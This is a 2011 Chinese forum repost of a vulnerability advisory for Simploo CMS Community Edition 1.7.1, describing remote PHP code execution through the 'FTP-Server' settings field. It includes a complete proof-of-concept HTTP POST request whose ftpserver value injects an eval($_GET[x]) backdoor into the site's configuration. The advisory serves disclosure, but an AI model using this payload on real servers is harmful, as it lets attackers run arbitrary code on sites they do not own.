发新话题
打印

[转载]Simploo CMS 'FTP-Server' Field Remote远程PHP代码执行漏洞

[转载]Simploo CMS 'FTP-Server' Field Remote远程PHP代码执行漏洞

原始出处:leehoosoftware.org
发布时间:2011-1-20
更新时间:2011-1-20
漏洞属性:原创
严重程度:高
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Simploo GmbH Simploo CMS Community Edition 1.7.1

详细描述
Simploo CMS是容易产生远程PHP代码执行漏洞
利用此问题将允许攻击者执行范围内的网络服务器中任意代码。
Simploo GmbH Simploo CMS Community Edition 1.7.1是脆弱的,其他版本也可能受到影响。


测试代码
POST /simploo/index.php/sicore/updates/optionssave HTTP/1.1
Host: localhost User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de;
rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: application/json, text/javascript, */*
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate Accept-Charset:
ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest Referer:
http://localhost/simploo/index.php/sifront/page/show/%5Bdraft%5D1
Cookie: PHPSESSID=r87k31lhqmbp9707io8r6qr2p6;
si_admin_selected=si_tree_settings_updates_options;
si_admin_open=si_tree_settings_general%2Csi_tree_settings_general_system%2Csi_tree_settings_updates%2Csi_tree_settings_bemodules%2Csi_tree_settings_contentelements
Pragma: no-cache Cache-Control: no-cache Content-Length: 105
ftpenable=&ftpserver=*%2F+eval%28%24_GET%5Bx%5D%29%3B%2F*&ftpuser=&ftppass=&ftppasv=0&ftpssl=0&ftpremote=

解决方案
目前我们没有发现任何供应商提供的修补程序意识。

相关信息
http://www.leehoosoftware.org

[ 本帖最后由 eviloctal 于 2011-2-3 11:21 编辑 ]

TOP

发新话题